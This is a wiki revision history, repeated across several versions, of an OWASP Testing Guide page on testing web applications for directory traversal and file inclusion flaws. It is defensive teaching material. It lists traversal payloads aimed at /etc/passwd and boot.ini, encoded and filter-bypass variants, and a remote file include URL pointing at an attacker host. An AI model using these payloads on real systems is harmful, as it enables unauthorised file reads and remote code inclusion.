Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values, ...) are not well validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the '''dot-dot-slash''' attack (../), '''path traversal''', '''directory climbing''', '''backtracking'''.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:
* ('''a''') '''Input Vectors Enumeration''' (a systematical evaluation of each input vector)
* ('''b''') '''Exploiting Techniques''' (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability).
 

== Black Box testing and example ==
('''a''') '''Input Vectors Enumeration''' 
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient ''validation''/''sanitization'' process, also for the directory traversal is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.

Examples of checks to be performed at this stage include:

* Do you notice some parameters which you could recognize as file related into HTTP requests?
* Strange file extension?
* Curious variable name?
<pre>
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
</pre>

* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?

<pre>
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
</pre>
 

('''b''') '''Exploit Techniques'''

As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.

Using the previous examples:

The dynamic page called ''getUserProfile.jsp'' is used to load static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.

<pre>
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
</pre>

For the cookies example, we have:
<pre>
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
</pre>

It's also possible to include files (''scripts too!'') located on external website. Let's see:
<pre>
http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt
</pre>

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
<pre>
http://example.com/main.cgi?home=main.cgi
</pre>

The component called "''main.cgi''" is located into the same directory of the normal HTML static files used by the application.
Sometimes, when the attackers are not so lucky, they need to use special chars (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.

It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding.
During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.

Each operating system use different chars as path separator:

''Unix-like os'':
<pre>
"/" root directory
"/" directory separator
</pre>

''Windows os'':
<pre>
"<drive letter>:\" root directory
"\" but also "/" directory separator
</pre>
(Usually on Win, the directory traversal attack is limited to a single partition)

''Classic Mac os'':
<pre>
"<drive letter>:" root directory
":" directory separator
</pre>
 
We should take in account the following chars encoding:

* URL encoding e double URL encoding

<pre>
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
</pre>

* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

<pre>
..%c0%af represents ../
..%c1%9c represents ..\
</pre>
 

== Gray Box testing and example ==
When the analysis is performed with a White Box approach, we have to follow the same methodology as in the Black Box Testing. However, since we can review the source code is possible to search the input vectors (''stage ('''a''') of the testing'') more easily and accurately.
During a source code review we can use simple tools (as the ''grep'' command) to search one or more common patterns into the application code: inclusion functions/methods, filesystem operations and so on.

<pre>
PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...
</pre>

Using online code search engines (Google CodeSearch[http://www.google.com/codesearch], Koders[http://www.koders.com/]) is also possible to find directory traversal flaws into OpenSource software published on Internet.

For PHP, we can use:
<pre>
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
</pre>
 
During a Gray Box Testing is usually possible to discover vulnerabilities that are impossible (''or very difficult!'') to find performing a Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored into a database; if an attacker could insert crafted directory traversal strings when the application saves the data, probably it will occurs a sort of "indirect" directory traversal attack. This kind of security problems is difficult to find because the parameters inside the inclusion functions seem internal and "safe" but otherwise they are not.

Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to massage invalid input to make it valid, avoiding warnings and errors. This functions are usually prone to security flaws.

Considering a web application with these instructions:
<pre>
filename = Request.QueryString(“file”);
Replace(filename, “/”,”\”);
Replace(filename, “..\”,””);
</pre>

An aggressor could exploit the flaw, as in following example:
<pre>
file=....//....//boot.ini
file=....\\....\\boot.ini
file= ..\..\boot.ini
</pre>
 

== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for Directory Traversal

2006-11-06T09:53:02Z

Ikkisoft: /* Gray Box testing and example */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
Usually, web servers and web applications implement authentication mechanisms in order to control the access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using ''Access Control Lists'' (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common ''/etc/passwd'' into Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values, ...) are not well validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the '''dot-dot-slash''' attack (../), '''path traversal''', '''directory climbing''', '''backtracking'''.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:
* ('''a''') '''Input Vectors Enumeration''' (a systematical evaluation of each input vector)
* ('''b''') '''Exploiting Techniques''' (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability).
 

== Black Box testing and example ==
('''a''') '''Input Vectors Enumeration''' 
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient ''validation''/''sanitization'' process, also for the directory traversal is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.

Examples of checks to be performed at this stage include:

* Do you notice some parameters which you could recognize as file related into HTTP requests?
* Strange file extension?
* Curious variable name?
<pre>
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
</pre>

* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?

<pre>
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
</pre>
 

('''b''') '''Exploit Techniques'''

As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.

Using the previous examples:

The dynamic page called ''getUserProfile.jsp'' is used to load static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.

<pre>
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
</pre>

For the cookies example, we have:
<pre>
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
</pre>

It's also possible to include files (''scripts too!'') located on external website. Let's see:
<pre>
http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt
</pre>

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
<pre>
http://example.com/main.cgi?home=main.cgi
</pre>

The component called "''main.cgi''" is located into the same directory of the normal HTML static files used by the application.
Sometimes, when the attackers are not so lucky, they need to use special chars (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.

It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding.
During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.

Each operating system use different chars as path separator:

''Unix-like os'':
<pre>
"/" root directory
"/" directory separator
</pre>

''Windows os'':
<pre>
"<drive letter>:\" root directory
"\" but also "/" directory separator
</pre>
(Usually on Win, the directory traversal attack is limited to a single partition)

''Classic Mac os'':
<pre>
"<drive letter>:" root directory
":" directory separator
</pre>
 
We should take in account the following chars encoding:

* URL encoding e double URL encoding

<pre>
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
</pre>

* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

<pre>
..%c0%af represents ../
..%c1%9c represents ..\
</pre>

== Gray Box testing and example ==
When the analysis is performed with a White Box approach, we have to follow the same methodology as in the Black Box Testing. However, since we can review the source code is possible to search the input vectors (''stage ('''a''') of the testing'') more easily and accurately.
During a source code review we can use simple tools (as the ''grep'' command) to search one or more common patterns into the application code: inclusion functions/methods, filesystem operations and so on.

<pre>
PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...
</pre>

Using online code search engines (Google CodeSearch[http://www.google.com/codesearch], Koders[http://www.koders.com/]) is also possible to find directory traversal flaws into OpenSource software published on Internet.

For PHP, we can use:
<pre>
lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)
</pre>
 
During a Gray Box Testing is usually possible to discover vulnerabilities that are impossible (''or very difficult!'') to find performing a Black Box assessment.

Some web applications generate dynamic pages using values and parameters stored into a database; if an attacker could insert crafted directory traversal strings when the application saves the data, probably it will occurs a sort of "indirect" directory traversal attack. This kind of security problems is difficult to find because the parameters inside the inclusion functions seem internal and "safe" but otherwise they are not.

Additionally, reviewing the source code, it is possible to analyze the functions that are supposed to handle invalid input: some developers try to massage invalid input to make it valid, avoiding warnings and errors. This functions are usually prone to security flaws.

Considering a web application with these instructions:
<pre>
filename = Request.QueryString(“file”);
Replace(filename, “/”,”\”);
Replace(filename, “..\”,””);
</pre>

An aggressor could exploit the flaw, as in following example:
<pre>
file=....//....//boot.ini
file=....\\....\\boot.ini
file= ..\..\boot.ini
</pre>
 

== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for Directory Traversal

2006-11-06T09:48:25Z

Ikkisoft: /* Black Box testing and example */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
Usually, web servers and web applications implement authentication mechanisms in order to control the access to files and resources.
Web servers try to confine users' files inside a "root directory" or "web document root" which represents a physical directory on the file system; users have just to consider this directory as the base directory into the hierarchical structure of the web application.
The definition of the privileges is made using ''Access Control Lists'' (ACL) that identify which users and groups are supposed to be able to access, modify or execute a specific file on the server.
These mechanisms are designed to prevent the access to sensible files from malicious users (example: the common ''/etc/passwd'' into Unix-like platform) or to avoid the execution of system commands.

Many web applications use server-side scripts to include different kinds of files: is quite common to use this method to manage graphics templates, load static texts, and so on. Unfortunately, these applications show security issues if the input parameters used (form parameters, cookies values, ...) are not well validated.

In web servers and web applications too, this kind of problem arises in directory traversal/file include attacks; exploiting this kind of vulnerability an attacker is able read directory and files which normally he/she couldn't read, access data outside the web document root, include scripts and other kinds of files from external websites.

For the purpose of the OWASP Testing Guide, we will just consider the security threats related to web applications and not to web server (as the infamous "%5c escape code" into Microsoft IIS web server). We will provide further reading, in the references section, for the interested readers.

This kind of attack is also know as the '''dot-dot-slash''' attack (../), '''path traversal''', '''directory climbing''', '''backtracking'''.

During an assessment, in order to discover directory traversal and file include flaws, we need to perform two different stages:
* ('''a''') '''Input Vectors Enumeration''' (a systematical evaluation of each input vector)
* ('''b''') '''Exploiting Techniques''' (a methodical evaluation of each attack technique used by an aggressor to exploit the vulnerability).
 

== Black Box testing and example ==
('''a''') '''Input Vectors Enumeration''' 
As others unvalidated input vulnerabilities, in which an aggressor exploit the insufficient ''validation''/''sanitization'' process, also for the directory traversal is necessary to consider each parameter whose value is provided by the users: form parameters (GET/POST), values inside cookies, values stored into databases from previous client-server interactions, others HTTP header parameters.

Examples of checks to be performed at this stage include:

* Do you notice some parameters which you could recognize as file related into HTTP requests?
* Strange file extension?
* Curious variable name?
<pre>
http://example.com/getUserProfile.jsp?item=ikki.html
http://example.com/index.php?file=content
http://example.com/main.cgi?home=index.htm
</pre>

* Is it possible to identify cookies used by the web application for the dynamic generation of pages/templates?

<pre>
Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower
Cookie: USER=1826cc8f:PSTYLE=GreenDotRed
</pre>
 

('''b''') '''Exploit Techniques'''

As next step, during the assessment, we need to analyze the different attack techniques used by an aggressor in order to evaluate the input validation functions present into the web application.

Using the previous examples:

The dynamic page called ''getUserProfile.jsp'' is used to load static informations from a file, showing the content to users. An attacker could insert the malicious string "''../../../../etc/passwd''" to include the password hash file of a Linux/Unix system.
Obviously this kind of attack is possible only if the validation checkpoint fails; according to the filesystem privileges, the web application itself must be able to read the file.

To exploit this flaw, an aggressor needs some knowledge on where to blindly find any default files and directories on the system: guessing and trying again until the attack works is usually an easy way to perform a directory climbing.

<pre>
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
</pre>

For the cookies example, we have:
<pre>
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
</pre>

It's also possible to include files (''scripts too!'') located on external website. Let's see:
<pre>
http://example.com/index.php?file=http://www.attackerwebsite.com/malicioustxt
</pre>

The following example will demonstrate how is it possible to show the source code of a CGI component, without using any path traversal chars.
<pre>
http://example.com/main.cgi?home=main.cgi
</pre>

The component called "''main.cgi''" is located into the same directory of the normal HTML static files used by the application.
Sometimes, when the attackers are not so lucky, they need to use special chars (like the "'''.'''" dot, "'''%00'''" null, ...) in order to bypass file extension controls and/or stop the script execution.

It's also very important to notice that when developers implement an input validation function sometimes they don't consider every possible chars encoding.
During a Black Box Test is useful to try to inject every kind of chars encoding and also every kind of path definition.

Each operating system use different chars as path separator:

''Unix-like os'':
<pre>
"/" root directory
"/" directory separator
</pre>

''Windows os'':
<pre>
"<drive letter>:\" root directory
"\" but also "/" directory separator
</pre>
(Usually on Win, the directory traversal attack is limited to a single partition)

''Classic Mac os'':
<pre>
"<drive letter>:" root directory
":" directory separator
</pre>
 
We should take in account the following chars encoding:

* URL encoding e double URL encoding

<pre>
%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../
%2e%2e%5c represents ..\
%2e%2e\ represents ..\
..%5c represents ..\
%252e%252e%255c represents ..\
..%255c represents ..\ and so on.
</pre>

* Unicode/UTF-8 Encoding (It just works in systems which are able to accept overlong UTF-8 sequences)

<pre>
..%c0%af represents ../
..%c1%9c represents ..\
</pre>

== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for Directory Traversal

2006-11-06T09:28:25Z

Ikkisoft: /* Description of the Issue */

Testing for Directory Traversal

2006-11-06T08:58:04Z

Ikkisoft: /* Brief Summary */

Testing for Directory Traversal

2006-11-06T08:57:33Z

Ikkisoft: /* Brief Summary */

{{Template:OWASP Testing Guide v2}}

== Brief Summary ==
 
Nowadays, many web applications use and manage files. Using input validation methods not well designed, an aggressor could exploit the system in order to read/write files that are not intended to be accessible; in particular situations it could be possible to execute arbitrary code or system commands.
 

== Description of the Issue ==
 
...here: Short Description of the Issue: Topic and Explanation
 
== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}